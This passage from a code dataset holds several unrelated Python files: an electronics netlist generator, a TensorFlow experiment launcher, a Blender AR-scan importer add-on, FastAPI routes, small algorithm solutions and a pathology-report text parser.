short_path.append_link(link_pair.name)\n self.class_paths[path.append_link(link_pair.name)] = class_path + [link_pair.value.link.self_class.target.name]\n\n main_internal_blocks: Dict[str, edgir.BlockLike] = {}\n other_internal_blocks: Dict[str, edgir.BlockLike] = {}\n if isinstance(block, edgir.HierarchyBlock):\n for block_pair in block.blocks:\n subblock = block_pair.value\n # ignore pseudoblocks like bridges and adapters that have no internals\n if not subblock.hierarchy.blocks and 'fp_is_footprint' not in subblock.hierarchy.meta.members.node:\n other_internal_blocks[block_pair.name] = block_pair.value\n else:\n main_internal_blocks[block_pair.name] = block_pair.value\n\n if len(main_internal_blocks) == 1:\n name = list(main_internal_blocks.keys())[0]\n self.short_paths[path.append_block(name)] = short_path\n self.class_paths[path.append_block(name)] = class_path\n else:\n for (name, subblock) in main_internal_blocks.items():\n self.short_paths[path.append_block(name)] = short_path.append_block(name)\n self.class_paths[path.append_block(name)] = class_path + [subblock.hierarchy.self_class.target.name]\n\n for (name, subblock) in other_internal_blocks.items():\n self.short_paths[path.append_block(name)] = short_path.append_block(name)\n self.class_paths[path.append_block(name)] = class_path + [subblock.hierarchy.self_class.target.name]\n\n if 'nets' in block.meta.members.node:\n # add all-pairs edges\n # list conversion to deal with iterable-once\n flat_ports = list(chain(*[self.flatten_port(path.append_port(port_pair.name), port_pair.value)\n for port_pair in block.ports]))\n for src_path in flat_ports:\n for dst_path in flat_ports:\n if src_path != dst_path:\n self.edges.setdefault(src_path, []).append(dst_path)\n\n if 'nets_packed' in block.meta.members.node:\n # this connects the first source to all destinations, then asserts all the sources are equal\n # this leaves the sources unconnected, to be connected externally and checked at the end\n src_port_name = block.meta.members.node['nets_packed'].members.node['src'].text_leaf\n dst_port_name = block.meta.members.node['nets_packed'].members.node['dst'].text_leaf\n flat_srcs = list(self.flatten_port(path.append_port(src_port_name), edgir.pair_get(block.ports, src_port_name)))\n flat_dsts = list(self.flatten_port(path.append_port(dst_port_name), edgir.pair_get(block.ports, dst_port_name)))\n assert flat_srcs, \"missing source port(s) for packed net\"\n for dst_path in flat_dsts:\n self.edges.setdefault(flat_srcs[0], []).append(dst_path)\n self.edges.setdefault(dst_path, []).append(flat_srcs[0])\n for src_path in flat_srcs: # assert all sources connected\n for dst_path in flat_srcs:\n self.assert_connected.append((src_path, dst_path))\n\n if 'fp_is_footprint' in block.meta.members.node:\n footprint_name = self.design.get_value(path.to_tuple() + ('fp_footprint',))\n footprint_pinning = self.design.get_value(path.to_tuple() + ('fp_pinning',))\n mfr = self.design.get_value(path.to_tuple() + ('fp_mfr',))\n part = self.design.get_value(path.to_tuple() + ('fp_part',))\n value = self.design.get_value(path.to_tuple() + ('fp_value',))\n refdes = self.design.get_value(path.to_tuple() + ('fp_refdes',))\n lcsc_part = self.design.get_value(path.to_tuple() + ('lcsc_part',))\n\n assert isinstance(footprint_name, str)\n assert isinstance(footprint_pinning, list)\n assert isinstance(mfr, str) or mfr is None\n assert isinstance(part, str) or part is None\n assert isinstance(value, str) or value is None\n assert isinstance(lcsc_part, str) or lcsc_part is None\n assert isinstance(refdes, str)\n\n part_comps = [\n part,\n f\"({mfr})\" if mfr else \"\"\n ]\n part_str = \" \".join(filter(None, part_comps))\n value_comps = [\n part_str,\n value\n ]\n value_str = \" - \".join(filter(None, value_comps))\n\n self.blocks[path] = kicad.Block(\n footprint_name,\n refdes,\n part_str,\n\n # Uncomment one to set value field\n # TODO this should be a user flag\n value_str, # including manufacturer\n # lcsc_part or \"\",\n\n list(path.blocks),\n list(self.short_paths[path].blocks),\n self.class_paths[path],\n )\n\n if self.refdes_mode == \"pathName\":\n self.names[path] = self.short_paths[path]\n elif self.refdes_mode == \"refdes\":\n self.names[path] = TransformUtil.Path.empty().append_block(refdes)\n else:\n raise ValueError(f\"Invalid valueMode value {self.refdes_mode}\")\n\n for pin_spec in footprint_pinning:\n assert isinstance(pin_spec, str)\n pin_spec_split = pin_spec.split('=')\n assert len(pin_spec_split) == 2\n pin_name = pin_spec_split[0]\n port_path = edgir.LocalPathList(pin_spec_split[1].split('.'))\n\n pin_path = path.append_port(pin_name)\n self.pins.add(pin_path)\n self.short_paths[pin_path] = short_path.append_port(pin_name)\n\n src_path = path.follow(port_path, block)[0]\n\n # Create a unidirectional edge from the port to the footprint pin\n self.edges.setdefault(src_path, []).append(pin_path)\n self.edges.setdefault(pin_path, []) # create a dummy entry\n\n self.names[pin_path] = self.names[path].append_port(pin_name)\n\n for constraint_pair in block.constraints:\n if constraint_pair.value.HasField('connected'):\n self.process_connected(path, block, constraint_pair.value.connected)\n elif constraint_pair.value.HasField('exported'):\n self.process_exported(path, block, constraint_pair.value.exported)\n elif constraint_pair.value.HasField('exportedTunnel'):\n self.process_exported(path, block, constraint_pair.value.exportedTunnel)\n elif constraint_pair.value.HasField('connectedArray'):\n for expanded_connect in constraint_pair.value.connectedArray.expanded:\n self.process_connected(path, block, expanded_connect)\n elif constraint_pair.value.HasField('exportedArray'):\n for expanded_export in constraint_pair.value.exportedArray.expanded:\n self.process_exported(path, block, expanded_export)\n\n def process_connected(self, path: TransformUtil.Path, current: edgir.EltTypes, constraint: edgir.ConnectedExpr) -> None:\n if constraint.expanded:\n assert len(constraint.expanded) == 1\n self.process_connected(path, current, constraint.expanded[0])\n return\n assert constraint.block_port.HasField('ref')\n assert constraint.link_port.HasField('ref')\n self.connect_ports(\n path.follow(constraint.block_port.ref, current),\n path.follow(constraint.link_port.ref, current))\n\n def process_exported(self, path: TransformUtil.Path, current: edgir.EltTypes, constraint: edgir.ExportedExpr) -> None:\n if constraint.expanded:\n assert len(constraint.expanded) == 1\n self.process_exported(path, current, constraint.expanded[0])\n return\n assert constraint.internal_block_port.HasField('ref')\n assert constraint.exterior_port.HasField('ref')\n self.connect_ports(\n path.follow(constraint.internal_block_port.ref, current),\n path.follow(constraint.exterior_port.ref, current))\n\n def connect_ports(self, elt1: Tuple[TransformUtil.Path, edgir.EltTypes], elt2: Tuple[TransformUtil.Path, edgir.EltTypes]) -> None:\n \"\"\"Recursively connect ports as applicable\"\"\"\n if isinstance(elt1[1], edgir.Port) and isinstance(elt2[1], edgir.Port):\n self.edges.setdefault(elt1[0], []).append(elt2[0])\n self.edges.setdefault(elt2[0], []).append(elt1[0])\n elif isinstance(elt1[1], edgir.Bundle) and isinstance(elt2[1], edgir.Bundle):\n elt1_names = list(map(lambda pair: pair.name, elt1[1].ports))\n elt2_names = list(map(lambda pair: pair.name, elt2[1].ports))\n assert elt1_names == elt2_names, f\"mismatched bundle types {elt1}, {elt2}\"\n for key in elt2_names:\n self.connect_ports(\n (elt1[0].append_port(key), edgir.resolve_portlike(edgir.pair_get(elt1[1].ports, key))),\n (elt2[0].append_port(key), edgir.resolve_portlike(edgir.pair_get(elt2[1].ports, key))))\n # don't need to create the bundle connect, since Bundles can't be CircuitPorts\n else:\n raise ValueError(f\"can't connect types {elt1}, {elt2}\")\n\n def visit_portlike(self, context: TransformUtil.TransformContext, port: edgir.PortLike) -> None:\n self.pins.add(context.path)\n\n short_path = self.short_paths[context.path]\n if port.HasField('bundle'): # TODO maybe shorten if just one?\n for port_pair in port.bundle.ports:\n self.short_paths[context.path.append_port(port_pair.name)] = short_path.append_port(port_pair.name)\n elif port.HasField('array') and port.array.HasField('ports'):\n for port_pair in port.array.ports.ports:\n self.short_paths[context.path.append_port(port_pair.name)] = short_path.append_port(port_pair.name)\n\n def visit_block(self, context: TransformUtil.TransformContext, block: edgir.BlockTypes) -> None:\n self.process_blocklike(context.path, block)\n\n def visit_link(self, context: TransformUtil.TransformContext, link: edgir.Link) -> None:\n self.process_blocklike(context.path, link)\n\n def visit_linkarray(self, context: TransformUtil.TransformContext, link: edgir.LinkArray) -> None:\n self.process_blocklike(context.path, link)\n\n @staticmethod\n def name_net(net: Iterable[TransformUtil.Path], net_prefix: str) -> str:\n \"\"\"Names a net based on all the paths of ports and links that are part of the net.\"\"\"\n def pin_name_goodness(pin1: TransformUtil.Path, pin2: TransformUtil.Path) -> int:\n assert not pin1.params and not pin2.params\n # TODO rewrite rules to based on _anon internal depth, though elt[0] is likely where the _anon will be\n # First disprefer anon or auto-generated names\n if pin1.links and (pin1.links[0].startswith('anon') or pin1.links[0].startswith('_')) and \\\n (not pin2.links or pin2.links[0].startswith('anon') or pin2.links[0].startswith('_')):\n return 1\n elif (not pin1.links or pin1.links[0].startswith('anon') or pin1.links[0].startswith('_')) and \\\n (pin2.links and (pin2.links[0].startswith('anon') or pin2.links[0].startswith('_'))):\n return -1\n elif len(pin1.blocks) != len(pin2.blocks): # prefer shorter block paths\n return len(pin1.blocks) - len(pin2.blocks)\n elif len(pin1.ports) == 1 and pin1.ports[0].isnumeric() and \\\n (len(pin2.ports) != 1 or (pin2.ports and not pin2.ports[-1].isnumeric())): # disprefer number-only ports\n return 1\n elif len(pin2.ports) == 1 and pin2.ports[0].isnumeric() and \\\n (len(pin1.ports) != 1 or (pin1.ports and not pin1.ports[-1].isnumeric())): # disprefer number-only ports\n return -1\n elif len(pin1.ports) != len(pin2.ports): # prefer shorter port lengths\n return len(pin1.ports) - len(pin2.ports)\n elif pin1.ports and not pin2.ports: # prefer ports\n return -1\n elif not pin1.ports and pin2.ports:\n return 1\n elif pin1.links and not pin2.links: # prefer links\n return -1\n elif not pin1.links and pin2.links:\n return 1\n else: # prefer shorter pin paths\n return len(pin1.ports) - len(pin2.ports)\n best_path = sorted(net, key=cmp_to_key(pin_name_goodness))[0]\n\n return net_prefix + str(best_path)\n\n def run(self) -> Netlist:\n self.transform_design(self.design.design)\n\n # Sanity check to ensure all pins exist\n for pin_src, pins_dst in self.edges.items():\n assert pin_src in self.pins, f\"missing net edge src pin {pin_src}\"\n for pin_dst in pins_dst:\n assert pin_dst in self.pins, f\"missing net edge dst pin {pin_dst}\"\n\n # Convert to the netlist format\n seen: Set[TransformUtil.Path] = set()\n nets: List[List[TransformUtil.Path]] = [] # use lists instead of sets to preserve ordering\n\n for port, conns in self.edges.items():\n if port not in seen:\n curr_net: List[TransformUtil.Path] = []\n frontier: List[TransformUtil.Path] = [port] # use BFS to maintain ordering instead of simpler DFS\n while frontier:\n pin = frontier.pop(0)\n if pin not in seen:\n seen.add(pin)\n curr_net.append(pin)\n frontier.extend(self.edges[pin])\n nets.append(curr_net)\n\n pin_to_net: Dict[TransformUtil.Path, List[TransformUtil.Path]] = {} # values share reference to nets\n for net in nets:\n for pin in net:\n pin_to_net[pin] = net\n\n for (connected1, connected2) in self.assert_connected:\n if pin_to_net[connected1] is not pin_to_net[connected2]:\n raise InvalidPackingException(f\"packed pins {connected1}, {connected2} not connected\")\n\n def name_pin(pin: TransformUtil.Path) -> TransformUtil.Path:\n if pin in self.short_paths:\n return self.short_paths[pin]\n else:\n return pin\n\n board_refdes_prefix = self.design.get_value(('refdes_prefix',))\n if board_refdes_prefix is not None:\n assert isinstance(board_refdes_prefix, str)\n net_prefix = board_refdes_prefix\n else:\n net_prefix = ''\n named_nets = {self.name_net([name_pin(pin) for pin in net], net_prefix): net\n for net in nets}\n\n netlist_blocks = {str(self.names[block_path]): block\n for block_path, block in self.blocks.items()}\n netlist_nets = {name: [self.path_to_pin(self.names[pin])\n for pin in net if pin in self.names]\n for name, net in named_nets.items()}\n\n return Netlist(netlist_blocks, netlist_nets)\n","repo_name":"BerkeleyHCI/PolymorphicBlocks","sub_path":"electronics_model/NetlistGenerator.py","file_name":"NetlistGenerator.py","file_ext":"py","file_size_in_byte":16765,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"35"}
+{"seq_id":"37755447265","text":"import tensorflow as tf\nimport subprocess\nimport sys\nimport itertools\nimport json\nimport random\n\n# Parameters for loss types\nmean_over_batch = {\"True\", \"False\"}\nlinearity = {\"True\", \"False\"}\nloss_type = {\"dist\", \"ratio\"}\nloss_form = {\"log\", \"minus\", \"inverse\" }\nargnames= [\"mean_over_batch\", \"loss_type\", \"loss_form\"]\n\n\n# Params for Architecture\nlosses= [['True', 'ratio', 'minus'], ['False', 'dist', 'log'], ['True', 'dist', 'log'], ['False', 'ratio', 'minus']]\nnumber_of_layers = [3, 4]\nkernel_size = [7, 5, 3]\nchannels = [1, 2, 3]\n\n#Try later\n#dilation = [1,2]\n#dropout = [0.8,1]\n\n\nargnames= [\"mean_over_batch\", \"loss_type\", \"loss_form\", \"kernel_shape\", \"dialation_rate\"]\n\n#archs_perm = [losses, number_of_layers, kernel_type, channels]\n\n\ndef main(unusedargs):\n linearity_experiment()\n\n\ndef loss_experiment():\n print('Running..')\n loss_perm = [mean_over_batch, loss_type, loss_form]\n params = list(itertools.product(*loss_perm))\n\n for param in params:\n script = [\"python train.py\"]\n i = 0\n name = \"loss=\"\n for argname in argnames:\n script.append(\"--\"+argname+\"=\"+param[i])\n name += '_'+param[i]\n i = i + 1\n script.append(\"--exp_name=\"+str(name))\n script.append(\"--steps=1000\")\n script = ' '.join(script)\n print(script)\n subprocess.call(script, shell=True)\n\n\ndef linearity_experiment():\n print('running')\n loss_perm = [linearity, mean_over_batch, loss_type, loss_form]\n params = list(itertools.product(*loss_perm))\n argnames= [\"linear\", \"mean_over_batch\", \"loss_type\", \"loss_form\"]\n\n for param in params:\n script = [\"python train.py\"]\n i = 0\n name = \"lin=\"\n for argname in argnames:\n script.append(\"--\"+argname+\"=\"+param[i])\n name += '_'+param[i]\n i = i + 1\n print(param[0])\n\n\n kernel = construct_kernel(random.choice(number_of_layers))\n if param[0]=='True':\n kernel = [[32,32,1,1]]\n\n script.append(\"--kernel_shape=\"+json.dumps(kernel).replace(\" \", \"\"))\n script.append(\"--exp_name=\"+str(name))\n script.append(\"--steps=1000\")\n script = ' '.join(script)\n print(script)\n subprocess.call(script, shell=True)\n\n# Experiment for architectures\ndef architecture_experiment():\n kernel_shapes = []\n for i in range (40):\n kernel_shapes.append(construct_kernel(random.choice(number_of_layers)))\n\n archs_perm = [losses, kernel_shapes]\n params = list(itertools.product(*archs_perm))\n argnames= [\"mean_over_batch\", \"loss_type\", \"loss_form\"]\n #print(len(params))\n for param in params:\n script = [\"python train.py\"]\n i = 0\n name = \"arch_l\" + str(len(param[1]))+\"=[\"\n for row in param[1]:\n name += str(row[0])+\",\"+str(row[3])+\"-\"\n name +=\"]\"\n for argname in argnames:\n script.append(\"--\"+argname+\"=\"+param[0][i])\n name += '_'+param[0][i]\n i = i + 1\n\n script.append(\"--kernel_shape=\"+json.dumps(param[1]).replace(\" \", \"\"))\n script.append(\"--exp_name=\"+str(name))\n script.append(\"--steps=400\")\n script = ' '.join(script)\n #print(name)\n subprocess.call(script, shell=True)\n\n\n\ndef construct_kernel(num_layer):\n\n def calc_channel(k_size, coef):\n return 25*coef/(k_size)\n\n k_size = random.choice(kernel_size)\n if num_layer == 1:\n return [[k_size, k_size, 1, 1]]\n\n k_last_size = random.choice(kernel_size)\n coef = random.choice(channels)\n channel = calc_channel(k_last_size, coef)\n kernel_shape = [[k_size, k_size, 1, channel]]\n\n if num_layer == 2:\n new_layer = [k_last_size, k_last_size, channel, 1]\n kernel_shape.append(new_layer)\n return kernel_shape\n\n if num_layer>2:\n for i in range(num_layer-2):\n old_channel = channel\n coef = random.choice(channels)\n k_size = random.choice(kernel_size)\n channel = calc_channel(k_size, coef)\n\n new_layer = [k_size, k_size, old_channel, channel]\n kernel_shape.append(new_layer)\n\n new_layer = [k_last_size, k_last_size, channel, 1]\n kernel_shape.append(new_layer)\n return kernel_shape\n\n\nif __name__ == '__main__':\n tf.app.run(main=main, argv=[sys.argv[0]])\n","repo_name":"seung-lab/FilterFinder","sub_path":"experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":4345,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
+{"seq_id":"22844441013","text":"\nimport bpy\nfrom bpy.props import *\nfrom bpy.types import Menu, Operator, Panel, UIList, AddonPreferences\nfrom bpy.app.handlers import persistent\nimport os\nfrom os.path import basename, dirname, join\nimport shutil\nimport requests\n\nclass ARImporterAddonPreferences(AddonPreferences):\n\n bl_idname = basename(dirname(__file__)) # directory name containing this file\n\n ip_address = StringProperty(\n name=\"IP Address\",\n )\n\n ar_root = StringProperty(\n name=\"Storage root\",\n subtype='FILE_PATH',\n )\n\n def draw(self, context):\n layout = self.layout\n layout.prop(self, \"ip_address\")\n layout.prop(self, \"ar_root\")\n\n# -------------------------------------------------------------------------------\n# UI PANEL - Extra Image List\n# -------------------------------------------------------------------------------\nclass ARImporter_PT_ImagePreview(Panel):\n bl_space_type = 'VIEW_3D'\n bl_region_type = 'TOOLS'\n bl_category = \"AR Importer\"\n bl_label = \"Import\"\n\n def draw(self, context):\n layout = self.layout\n row = layout.row()\n row.operator(\"arimporter.latest\", text=\"Import Latest\")\n\n\nclass ARImportLatest(Operator):\n bl_idname = \"arimporter.latest\"\n bl_label = \"Latest\"\n bl_description = \"AR Import Latest\"\n\n def execute(self, context):\n user_preferences = context.user_preferences\n addon_prefs = user_preferences.addons[basename(dirname(__file__))].preferences\n root_url = \"http://%s/\" % addon_prefs.ip_address\n\n print(\"Importing latest \" + addon_prefs.ip_address)\n resp = requests.get(root_url + \"shots\").json()\n latest = resp[0]\n print(latest)\n local_shot_dir = join(addon_prefs.ar_root, latest[\"uuid\"])\n\n file_types = [\"_pointcloud_z.ply\", \".mov\", \"_scene.fbx\"]\n try:\n # Create target Directory\n os.mkdir(local_shot_dir)\n except FileExistsError:\n print(\"Directory \", local_shot_dir, \" already exists\")\n\n local_files = []\n for file_type in file_types:\n remote_url = root_url + \"content/shots/%s/shot-%s%s\" % (latest[\"uuid\"], latest[\"uuid\"], file_type)\n file_basename = basename(remote_url)\n local_file = join(local_shot_dir, file_basename)\n local_files.append(local_file)\n r = requests.get(remote_url, allow_redirects=True)\n open(local_file, 'wb').write(r.content)\n\n for local_file in local_files:\n if local_file.endswith(\".fbx\"):\n bpy.ops.import_scene.fbx(filepath=local_file, anim_offset=0, bake_space_transform=True)\n if local_file.endswith(\".ply\"):\n bpy.ops.import_mesh.ply(filepath=local_file)\n if local_file.endswith(\".mov\"):\n clip = bpy.data.movieclips.load(local_file)\n for area in bpy.context.screen.areas:\n if area.type == 'VIEW_3D':\n space_data = area.spaces.active\n space_data.show_background_images = True\n bg = space_data.background_images.new()\n bg.clip = clip\n bg.source = 'MOVIE_CLIP'\n bg.use_camera_clip = False\n bg.opacity = 1\n break\n\n return {'FINISHED'}\n\n\n","repo_name":"FreakTheMighty/BlenderARImporter","sub_path":"ar_importer_utils.py","file_name":"ar_importer_utils.py","file_ext":"py","file_size_in_byte":3405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"13727799760","text":"\"\"\"GET endpoints for users.\"\"\"\n\nfrom fastapi import APIRouter, Depends, HTTPException, status\nfrom sqlalchemy.orm import Session\n\nfrom db.database import get_db\nimport schemas\nfrom db import crud\n\nrouter = APIRouter(prefix=\"/users\", tags=[\"user\"])\n\n\n@router.get(\"/\", response_model=list[schemas.UserInfo])\nasync def read_users_id(skip: int = 0, limit: int = 100, db: Session = Depends(get_db)):\n \"\"\"Read all users ids.\"\"\"\n items = crud.get_all_users(db, skip=skip, limit=limit)\n if len(items) == 0:\n raise HTTPException(status_code=404, detail=\"Users not found\")\n return items\n\n\n@router.get(\n \"/{telegram_id}\", response_model=schemas.UserEdit, status_code=status.HTTP_200_OK\n)\nasync def read_user(telegram_id: int, db: Session = Depends(get_db)):\n \"\"\"Read user by telegram id without list of sent articles.\"\"\"\n db_user = crud.get_user(db, user_telegram_id=telegram_id)\n if db_user is None:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND, detail=\"User not found\"\n )\n return db_user\n\n\n@router.get(\"/{telegram_id}/articles\", response_model=schemas.UserArticlesSentView)\nasync def read_user_with_sent_articles(telegram_id: int, db: Session = Depends(get_db)):\n \"\"\"Get user info with a list of sent articles matching language code and user_telegram_id.\"\"\"\n db_articles = crud.get_user(db, user_telegram_id=telegram_id)\n if db_articles is None:\n raise HTTPException(status_code=404, detail=\"User not found\")\n return db_articles\n","repo_name":"VetalM84/fastApiKafkaBot","sub_path":"routers/users_get.py","file_name":"users_get.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
+{"seq_id":"29888259932","text":"import numpy as np\r\nimport math\r\nimport pandas as pd\r\n\r\ndf=pd.read_csv(\"A2Q2Data_train.csv\", sep=',',header=None)#The dataset is imported\r\n#please change the location of the file to that in the local computer\r\ndataset = df.to_numpy()\r\n\r\ny=dataset[:,100]\r\nX=dataset[:,0:100]\r\n\r\n\r\nX=np.transpose(X) #here the data points are in rows, this statement converts them to column notation\r\ny=np.transpose(y)\r\nw_ml=np.matmul(np.matmul((np.linalg.pinv(np.matmul(X,np.transpose(X)))),X),y)#The analytical solution for w_ml is directly used\r\nprint(w_ml)\r\n\r\n\r\n","repo_name":"Keshkrish/Machine-Learning-Algorithms","sub_path":"Linear_regression_analytically.py","file_name":"Linear_regression_analytically.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"16828075786","text":"from django.forms import ModelForm\nfrom .models import Entry\nfrom preferences import preferences\nfrom django.utils import timezone\nfrom django import forms\n\nclass EntryForm(ModelForm):\n class Meta:\n model = Entry\n fields = ['entry_date', 'destination', 'notes', 'odo_start', 'odo_end']\n widgets = {\n 'entry_date': forms.DateTimeInput(attrs={'placeholder': 'M/D/YYYY'}, format=\"%m/%d/%y\"),\n }\n \n def save(self, request, commit=True):\n obj = super().save(commit=False)\n obj.user = request.user\n obj.pub_date = timezone.now().date()\n obj.pay_period_start = obj.get_start_of_pay_period_date()\n obj.pay_period_end = obj.get_end_of_pay_period_date()\n \n if 'save' in request.POST:\n obj.draft = False\n elif 'save_as_draft' in request.POST:\n obj.draft = True\n\n if commit:\n obj.save()\n else:\n return obj\n ","repo_name":"jacksonfoster4/mileage_tfw","sub_path":"core/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"6963442278","text":"class Solution:\n\n # important question review\n # how to explore new properties to reduce time complexity\n # method in math without dp\n # need further optimizing\n def superEggDrop(self, K: int, N: int) -> int:\n f = lambda x, a, b: x if a <= b else x + 1\n ans = [[0 for _ in range(K+1)] for _ in range(N+1)]\n for n in range(1, N+1):\n ans[n][1] = n\n for k in range(2, K+1):\n ans[1][k] = 1\n ans[min(2, N)][k] = min(2, N)\n ans[min(3, N)][k] = min(2, N)\n for k in range(2, K+1):\n x = 1\n for n in range(4, N+1):\n x = f(x, max(ans[x-1][k-1], ans[n-x][k]), max(ans[x][k-1], ans[n-x-1][k]))\n ans[n][k] = max(ans[x-1][k-1], ans[n-x][k] + 1)\n return ans[-1][-1]\n\n\nsol = Solution()\nprint(sol.superEggDrop(3, 1000))\n","repo_name":"ParkerMa1879/leetCode","sub_path":"Hard/Q887/SuperEggDrop.py","file_name":"SuperEggDrop.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"34776032974","text":"# 백준 2294\n# 골드 5 / 동전 2\nimport sys\n\nn, k = map(int,sys.stdin.readline().split())\n\ndp = [float('inf') for _ in range(k+1)]\ncoin_set = set([])\nfor _ in range(n) :\n coin = int(sys.stdin.readline().strip())\n if coin > k :\n continue\n coin_set.add(coin)\n # 초기값 설정\n dp[coin] = 1\n\nfor i in range(1, k+1) :\n for item in coin_set :\n if i - item >= 1 :\n dp[i] = min(dp[i], dp[i-item] + 1)\n\nif dp[k] == float('inf') :\n print(-1)\nelse :\n print(dp[k])","repo_name":"leeyej-i/algorithm","sub_path":"DP/2294.py","file_name":"2294.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"43124762703","text":"from main.helpers import update_monument, format_monument, search_commons_url, search_commons_wlm\nfrom main.wiki_api import execute_query\nfrom django.core.management.base import BaseCommand, CommandError\nfrom main.models import Monument, CategorySnapshot\n\n\nclass Command(BaseCommand):\n help = 'Takes new snapshot'\n\n def add_arguments(self, parser):\n parser.add_argument('id', type=int)\n\n def handle(self, *args, **options):\n\n m = Monument.objects.get(pk=options['id'])\n print(m.relevant_images)\n\n for relevant_image_url in m.relevant_images:\n relevant_images_data = search_commons_url(relevant_image_url)\n print(relevant_images_data)\n\n if m.wlm_n:\n wlm_images_data = search_commons_wlm(m.wlm_n)\n print(len(wlm_images_data))\n\n \n","repo_name":"densitydesign/wlm-backend","sub_path":"server/wlm/main/management/commands/update_monument_pictures.py","file_name":"update_monument_pictures.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"74433260580","text":"import pandas as pd\nfrom pandas import DataFrame\nfrom base_etl import BaseETL\nfrom nltk.tokenize import LineTokenizer\nfrom functools import reduce\nline_tokenizer = LineTokenizer()\n\nclass GeneticStep02(BaseETL):\n\n def run(\n self,\n ):\n sql = \"SELECT * FROM gc_protocol.genetic_step_01 WHERE nullif(병리진단,'') is not null;\"\n df = self.df_from_sql(db_name=\"gc_protocol\", sql=sql)\n\n data = df.set_index(\"원무접수ID\")\n \n\n data_li = data.values.tolist()\n index_li = data.index.tolist()\n x = len(data_li)\n\n print(x)\n\n for j in range(1,15):\n exec(f\"A{j} = list(0 for i in range(0,x))\")\n \n\n for i in range(0,x):\n string = ''.join(data_li[i])\n list_void = line_tokenizer.tokenize(string)\n for j in range(1,15):\n exec(f\"A{j}[i] = []\")\n exec(f\"A{j}[i].append(index_li[i])\")\n for word in list_void:\n word_low = word.lower()\n if 'c-erb-b2' in word_low:\n eval(\"A1[i].append(word)\")\n if 'e-cadherin' in word_low:\n eval('A2[i].append(word)')\n if 'p53' in word_low:\n eval('A3[i].append(word)')\n if 'ki 67' in word_low:\n eval('A4[i].append(word)')\n if 'ki-67' in word_low:\n eval('A4[i].append(word)')\n if 'cd31 and d2-40' in word_low:\n eval('A5[i].append(word)')\n if 'c-kit' in word_low:\n eval('A6[i].append(word)')\n if 'cd34' in word_low:\n eval('A7[i].append(word)')\n if 'pkc-theta' in word_low:\n eval('A8[i].append(word)')\n if 's-100 protein' in word_low:\n eval('A9[i].append(word)')\n if 'a-sma' in word_low:\n eval('A10[i].append(word)')\n if 'smooth muscle actin' in word_low:\n eval('A10[i].append(word)')\n if 'ck' in word_low:\n eval('A11[i].append(word)')\n if 'chromogranin' in word_low:\n eval('A12[i].append(word)')\n if 'ebv' in word_low:\n eval('A13[i].append(word)')\n if 'giemsa' in word_low:\n eval('A14[i].append(word)')\n \n for j in range(1,15):\n exec(f\"dataA{j}=DataFrame(A{j})\")\n \n\n print(eval(\"dataA1\"))\n print(eval(\"dataA2\"))\n print(eval(\"dataA3\"))\n print(eval(\"dataA4\"))\n print(eval(\"dataA5\"))\n print(eval(\"dataA6\"))\n print(eval(\"dataA7\"))\n print(eval(\"dataA8\"))\n print(eval(\"dataA9\"))\n print(eval(\"dataA10\"))\n print(eval(\"dataA11\"))\n print(eval(\"dataA12\"))\n print(eval(\"dataA13\"))\n print(eval(\"dataA14\"))\n eval(\"dataA1.rename(columns={0:'원무접수ID',1:'HER2',2:'HER2_2'},inplace=True)\")\n eval(\"dataA2.rename(columns={0:'원무접수ID',1:'E_Cadherin',2:'E_Cadherin_2',3:'E_Cadherin_3', 4:'E_Cadherin_4'},inplace=True)\")\n eval(\"dataA3.rename(columns={0:'원무접수ID',1:'p53',2:'p53_2'},inplace=True)\")\n eval(\"dataA4.rename(columns={0:'원무접수ID',1:'Ki_67',2:'Ki_67_2',3:'Ki_67_3'},inplace=True)\")\n eval(\"dataA5.rename(columns={0:'원무접수ID',1:'CD31_N_D2_40'},inplace=True)\")\n eval(\"dataA6.rename(columns={0:'원무접수ID',1:'C_kit',2:'C_kit_2'},inplace=True)\")\n eval(\"dataA7.rename(columns={0:'원무접수ID',1:'CD34',2:'CD34_2'},inplace=True)\")\n eval(\"dataA8.rename(columns={0:'원무접수ID',1:'PKC_theta',2:'PKC_theta_2'},inplace=True)\")\n eval(\"dataA9.rename(columns={0:'원무접수ID',1:'s_100',2:'s_100_2',3:'s_100_3'},inplace=True)\")\n eval(\"dataA10.rename(columns={0:'원무접수ID',1:'SMA',2:'SMA_2'},inplace=True)\")\n eval(\"dataA11.rename(columns={0:'원무접수ID',1:'CK',2:'CK_2',3:'CK_3'},inplace=True)\")\n eval(\"dataA12.rename(columns={0:'원무접수ID',1:'Chromogranin',2:'Chromogranin_2'},inplace=True)\")\n eval(\"dataA13.rename(columns={0:'원무접수ID',1:'EBV',2:'EBV_2',3:'EBV_3'},inplace=True)\")\n eval(\"dataA14.rename(columns={0:'원무접수ID',1:'Giemsa',2:'Giemsa_2'},inplace=True)\")\n\n dfs=[eval(\"dataA1\"), eval(\"dataA2\"), eval(\"dataA3\"), eval(\"dataA4\"), eval(\"dataA5\"), eval(\"dataA6\"), eval(\"dataA7\"), eval(\"dataA8\"), eval(\"dataA9\"), eval(\"dataA10\"), \n eval(\"dataA11\"), eval(\"dataA12\"), eval(\"dataA13\"), eval(\"dataA14\")]\n data = reduce(lambda left, right: pd.merge(left, right, on='원무접수ID'), dfs)\n data1 = data.drop_duplicates()\n \n print(data1)\n data1.to_excel('C:/Users/Hyunjeong Ki/Gastric_Cancer_xlsx/genetic_step_02.xlsx')\n self.insert(data1, db_name=\"gc_protocol\", 